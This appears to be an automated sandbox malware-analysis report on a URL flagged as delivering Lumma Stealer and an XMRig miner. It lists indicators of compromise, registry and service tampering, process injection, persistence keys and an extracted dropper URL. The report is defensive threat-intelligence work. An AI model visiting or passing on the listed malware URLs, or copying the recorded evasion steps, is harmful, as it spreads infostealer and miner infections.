lumma | hxxp://files[.]zortos[.]me

Analysis

max time kernel
868s
max time network
870s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
01-04-2023 10:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://files.zortos.me

Score

10^/10

lumma xmrig evasion miner persistence stealer upx

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/k45gz/raw

Signatures

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs

Processes:

yflimjst.fex1.exeProcHost.execonhost.exe

description	pid	process	target process
PID 5508 created 3248	5508	yflimjst.fex1.exe	Explorer.EXE
PID 5508 created 3248	5508	yflimjst.fex1.exe	Explorer.EXE
PID 5508 created 3248	5508	yflimjst.fex1.exe	Explorer.EXE
PID 5508 created 3248	5508	yflimjst.fex1.exe	Explorer.EXE
PID 5508 created 3248	5508	yflimjst.fex1.exe	Explorer.EXE
PID 636 created 3248	636	ProcHost.exe	Explorer.EXE
PID 636 created 3248	636	ProcHost.exe	Explorer.EXE
PID 636 created 3248	636	ProcHost.exe	Explorer.EXE
PID 636 created 3248	636	ProcHost.exe	Explorer.EXE
PID 636 created 3248	636	ProcHost.exe	Explorer.EXE
PID 5684 created 3248	5684	conhost.exe	Explorer.EXE
PID 636 created 3248	636	ProcHost.exe	Explorer.EXE

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 30 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/5008-2021-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2050-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2056-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2071-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2078-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2085-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2091-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2097-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2111-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2127-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2135-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2143-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2149-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2155-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2161-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2173-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2179-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2191-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2221-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2223-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2244-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2250-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2262-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2264-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2275-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2277-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2279-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2281-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2289-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig
behavioral1/memory/5008-2319-0x00007FF797150000-0x00007FF797944000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

278 1840 powershell.exe
280 1840 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 2 IoCs

Processes:

yflimjst.fex1.exeProcHost.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts yflimjst.fex1.exe
File created C:\Windows\System32\drivers\etc\hosts ProcHost.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
278	1840	powershell.exe
280	1840	powershell.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	yflimjst.fex1.exe
File created	C:\Windows\System32\drivers\etc\hosts	ProcHost.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

jklLauncher.exekrnl_beta.exeCefSharp.BrowserSubprocess.exeKrnlUI.exeCefSharp.BrowserSubprocess.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	jklLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	krnl_beta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	CefSharp.BrowserSubprocess.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	KrnlUI.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	CefSharp.BrowserSubprocess.exe

Executes dropped EXE 18 IoCs

Processes:

krnl_beta.exe7za.exe7za.exeKrnlUI.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exejklLauncher.exeyflimjst.fex0.exeyflimjst.fex1.exeProcHost.exeCF_Game_Center.exedownloader.exedownloader.exeTheLongDrive.exeUnityCrashHandler64.exe

pid	process
4236	krnl_beta.exe
1120	7za.exe
5072	7za.exe
460	KrnlUI.exe
4016	CefSharp.BrowserSubprocess.exe
4896	CefSharp.BrowserSubprocess.exe
3224	CefSharp.BrowserSubprocess.exe
1196	CefSharp.BrowserSubprocess.exe
1736	CefSharp.BrowserSubprocess.exe
1744	jklLauncher.exe
3996	yflimjst.fex0.exe
5508	yflimjst.fex1.exe
636	ProcHost.exe
4760	CF_Game_Center.exe
1880	downloader.exe
4344	downloader.exe
1464	TheLongDrive.exe
2920	UnityCrashHandler64.exe

Loads dropped DLL 55 IoCs

Processes:

krnl_beta.exeKrnlUI.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exeTheLongDrive.exe

pid	process
4236	krnl_beta.exe
4236	krnl_beta.exe
460	KrnlUI.exe
460	KrnlUI.exe
460	KrnlUI.exe
460	KrnlUI.exe
460	KrnlUI.exe
460	KrnlUI.exe
460	KrnlUI.exe
460	KrnlUI.exe
460	KrnlUI.exe
460	KrnlUI.exe
460	KrnlUI.exe
4016	CefSharp.BrowserSubprocess.exe
4016	CefSharp.BrowserSubprocess.exe
4016	CefSharp.BrowserSubprocess.exe
4016	CefSharp.BrowserSubprocess.exe
4016	CefSharp.BrowserSubprocess.exe
4016	CefSharp.BrowserSubprocess.exe
4016	CefSharp.BrowserSubprocess.exe
4016	CefSharp.BrowserSubprocess.exe
4016	CefSharp.BrowserSubprocess.exe
4016	CefSharp.BrowserSubprocess.exe
4016	CefSharp.BrowserSubprocess.exe
4016	CefSharp.BrowserSubprocess.exe
4896	CefSharp.BrowserSubprocess.exe
4896	CefSharp.BrowserSubprocess.exe
4896	CefSharp.BrowserSubprocess.exe
4896	CefSharp.BrowserSubprocess.exe
4896	CefSharp.BrowserSubprocess.exe
4896	CefSharp.BrowserSubprocess.exe
4896	CefSharp.BrowserSubprocess.exe
3224	CefSharp.BrowserSubprocess.exe
3224	CefSharp.BrowserSubprocess.exe
3224	CefSharp.BrowserSubprocess.exe
3224	CefSharp.BrowserSubprocess.exe
3224	CefSharp.BrowserSubprocess.exe
3224	CefSharp.BrowserSubprocess.exe
3224	CefSharp.BrowserSubprocess.exe
1196	CefSharp.BrowserSubprocess.exe
1196	CefSharp.BrowserSubprocess.exe
1196	CefSharp.BrowserSubprocess.exe
1196	CefSharp.BrowserSubprocess.exe
1196	CefSharp.BrowserSubprocess.exe
1196	CefSharp.BrowserSubprocess.exe
1196	CefSharp.BrowserSubprocess.exe
1736	CefSharp.BrowserSubprocess.exe
1736	CefSharp.BrowserSubprocess.exe
1736	CefSharp.BrowserSubprocess.exe
1736	CefSharp.BrowserSubprocess.exe
1736	CefSharp.BrowserSubprocess.exe
1736	CefSharp.BrowserSubprocess.exe
1736	CefSharp.BrowserSubprocess.exe
1464	TheLongDrive.exe
1464	TheLongDrive.exe

UPX packed file 30 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/5008-2021-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2050-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2056-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2071-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2078-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2085-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2091-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2097-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2111-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2127-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2135-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2143-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2149-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2155-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2161-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2173-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2179-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2191-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2221-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2223-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2244-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2250-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2262-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2264-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2275-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2277-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2279-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2281-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2289-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx
behavioral1/memory/5008-2319-0x00007FF797150000-0x00007FF797944000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

parsecd.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Parsec.App.0 = "C:\\Users\\Admin\\Downloads\\Parsec (2)\\parsecd.exe app_silent=1"	parsecd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 24 IoCs

Processes:

TheLongDrive.exeUnityCrashHandler64.exe

description	ioc	process
File opened for modification	C:\Windows\system32\DLL\kernel32.pdb	TheLongDrive.exe
File opened for modification	C:\Windows\system32\dll\mono-2.0-bdwgc.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\system32\symbols\dll\mono-2.0-bdwgc.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\system32\dll\UnityPlayer_Win64_mono_x64.pdb	TheLongDrive.exe
File opened for modification	C:\Windows\system32\DLL\kernel32.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\system32\combase.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\system32\dll\ntdll.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\system32\ntdll.pdb	TheLongDrive.exe
File opened for modification	C:\Windows\system32\dll\ntdll.pdb	TheLongDrive.exe
File opened for modification	C:\Windows\system32\ntdll.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\system32\symbols\dll\ntdll.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\system32\kernelbase.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\system32\symbols\dll\kernelbase.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\system32\kernel32.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\system32\kernel32.pdb	TheLongDrive.exe
File opened for modification	C:\Windows\system32\mono-2.0-bdwgc.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\system32\dll\combase.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\system32\symbols\dll\combase.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\system32\symbols\DLL\kernel32.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\system32\symbols\dll\UnityPlayer_Win64_mono_x64.pdb	TheLongDrive.exe
File opened for modification	C:\Windows\system32\symbols\DLL\kernel32.pdb	TheLongDrive.exe
File opened for modification	C:\Windows\system32\symbols\dll\ntdll.pdb	TheLongDrive.exe
File opened for modification	C:\Windows\system32\dll\kernelbase.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\system32\UnityPlayer_Win64_mono_x64.pdb	TheLongDrive.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

ProcHost.exe

description	pid	process	target process
PID 636 set thread context of 5684	636	ProcHost.exe	conhost.exe
PID 636 set thread context of 5008	636	ProcHost.exe	conhost.exe

Drops file in Program Files directory 1 IoCs

Processes:

parsecd.exe

description ioc process

File opened for modification C:\Program Files (x86)\Parsec\pservice.exe parsecd.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Parsec\pservice.exe	parsecd.exe

Drops file in Windows directory 24 IoCs

Processes:

TheLongDrive.exeUnityCrashHandler64.exe

description	ioc	process
File opened for modification	C:\Windows\symbols\dll\UnityPlayer_Win64_mono_x64.pdb	TheLongDrive.exe
File opened for modification	C:\Windows\DLL\kernel32.pdb	TheLongDrive.exe
File opened for modification	C:\Windows\symbols\DLL\kernel32.pdb	TheLongDrive.exe
File opened for modification	C:\Windows\dll\ntdll.pdb	TheLongDrive.exe
File opened for modification	C:\Windows\symbols\dll\ntdll.pdb	TheLongDrive.exe
File opened for modification	C:\Windows\dll\kernelbase.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\DLL\kernel32.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\symbols\DLL\kernel32.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\dll\mono-2.0-bdwgc.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\dll\UnityPlayer_Win64_mono_x64.pdb	TheLongDrive.exe
File opened for modification	C:\Windows\ntdll.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\mono-2.0-bdwgc.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\symbols\dll\combase.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\UnityPlayer_Win64_mono_x64.pdb	TheLongDrive.exe
File opened for modification	C:\Windows\kernel32.pdb	TheLongDrive.exe
File opened for modification	C:\Windows\ntdll.pdb	TheLongDrive.exe
File opened for modification	C:\Windows\dll\ntdll.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\kernelbase.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\symbols\dll\kernelbase.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\symbols\dll\mono-2.0-bdwgc.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\combase.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\symbols\dll\ntdll.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\kernel32.pdb	UnityCrashHandler64.exe
File opened for modification	C:\Windows\dll\combase.pdb	UnityCrashHandler64.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1596 sc.exe
6028 sc.exe
5940 sc.exe
3608 sc.exe
4784 sc.exe
6076 sc.exe
5060 sc.exe
1868 sc.exe
1008 sc.exe
5760 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3416 1464 WerFault.exe TheLongDrive.exe

pid	process
1596	sc.exe
6028	sc.exe
5940	sc.exe
3608	sc.exe
4784	sc.exe
6076	sc.exe
5060	sc.exe
1868	sc.exe
1008	sc.exe
5760	sc.exe

pid	pid_target	process	target process
3416	1464	WerFault.exe	TheLongDrive.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

TheLongDrive.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\HARDWARE\DESCRIPTION\System\CentralProcessor\0	TheLongDrive.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	TheLongDrive.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	TheLongDrive.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	TheLongDrive.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exeCF_Game_Center.exechrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	CF_Game_Center.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	CF_Game_Center.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	CF_Game_Center.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133248249687682821"	chrome.exe

Modifies registry class 11 IoCs

Processes:

msedge.exeparsecd.exechrome.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\discord-478576776990425110	parsecd.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\discord-478576776990425110\URL Protocol	parsecd.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\discord-478576776990425110\shell\open\command\ = "C:\\Users\\Admin\\Downloads\\Parsec (2)\\parsecd.exe"	parsecd.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\discord-478576776990425110\shell\open\command	parsecd.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\discord-478576776990425110\shell	parsecd.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\discord-478576776990425110\shell\open	parsecd.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\discord-478576776990425110\ = "URL:Run game 478576776990425110 protocol"	parsecd.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\discord-478576776990425110\DefaultIcon	parsecd.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\discord-478576776990425110\DefaultIcon\ = "C:\\Users\\Admin\\Downloads\\Parsec (2)\\parsecd.exe"	parsecd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exeKrnlUI.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exeCefSharp.BrowserSubprocess.exe7zFM.exepowershell.exepowershell.exemsedge.exemsedge.exeyflimjst.fex1.exepowershell.exepowershell.exepowershell.exeProcHost.exepowershell.exe

pid	process
2044	chrome.exe
2044	chrome.exe
4136	chrome.exe
4136	chrome.exe
460	KrnlUI.exe
460	KrnlUI.exe
4016	CefSharp.BrowserSubprocess.exe
4016	CefSharp.BrowserSubprocess.exe
4896	CefSharp.BrowserSubprocess.exe
4896	CefSharp.BrowserSubprocess.exe
3224	CefSharp.BrowserSubprocess.exe
3224	CefSharp.BrowserSubprocess.exe
1196	CefSharp.BrowserSubprocess.exe
1196	CefSharp.BrowserSubprocess.exe
1736	CefSharp.BrowserSubprocess.exe
1736	CefSharp.BrowserSubprocess.exe
4124	7zFM.exe
4124	7zFM.exe
1840	powershell.exe
1840	powershell.exe
1840	powershell.exe
4936	powershell.exe
4936	powershell.exe
4936	powershell.exe
460	KrnlUI.exe
460	KrnlUI.exe
5880	msedge.exe
5880	msedge.exe
5696	msedge.exe
5696	msedge.exe
4124	7zFM.exe
4124	7zFM.exe
4124	7zFM.exe
4124	7zFM.exe
4124	7zFM.exe
4124	7zFM.exe
5508	yflimjst.fex1.exe
5508	yflimjst.fex1.exe
3972	powershell.exe
3972	powershell.exe
3972	powershell.exe
5508	yflimjst.fex1.exe
5508	yflimjst.fex1.exe
5508	yflimjst.fex1.exe
5508	yflimjst.fex1.exe
5508	yflimjst.fex1.exe
5508	yflimjst.fex1.exe
5524	powershell.exe
5524	powershell.exe
5524	powershell.exe
5508	yflimjst.fex1.exe
5508	yflimjst.fex1.exe
4124	7zFM.exe
4124	7zFM.exe
5972	powershell.exe
5972	powershell.exe
5972	powershell.exe
636	ProcHost.exe
636	ProcHost.exe
5408	powershell.exe
5408	powershell.exe
5408	powershell.exe
636	ProcHost.exe
636	ProcHost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

7zFM.exe

pid process

4124 7zFM.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

652

pid	process
4124	7zFM.exe

pid	process
652

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs

Processes:

chrome.exe

pid	process
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe
Token: SeShutdownPrivilege	2044	chrome.exe
Token: SeCreatePagefilePrivilege	2044	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exe7zFM.exemsedge.execonhost.exe

pid	process
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
2044	chrome.exe
